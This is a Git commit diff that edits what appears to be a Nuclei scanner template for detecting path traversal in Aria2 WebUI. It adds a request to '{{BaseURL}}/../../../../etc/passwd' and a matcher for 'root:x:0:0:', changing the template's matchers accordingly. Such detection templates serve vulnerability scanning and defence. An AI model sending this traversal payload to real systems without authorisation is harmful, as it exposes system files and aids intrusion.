patch-1
Dhiyaneshwaran 2023-08-24 09:23:50 +05:30 committed by GitHub
parent 091f576f6b
commit 73068f1b31
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 10 deletions

View File

@ -19,20 +19,19 @@ info:
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/../../../../etc/passwd"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Aria2 WebUI")'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
condition: and
- type: regex
part: body
part: body_2
regex:
- "root:x:0:0:"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200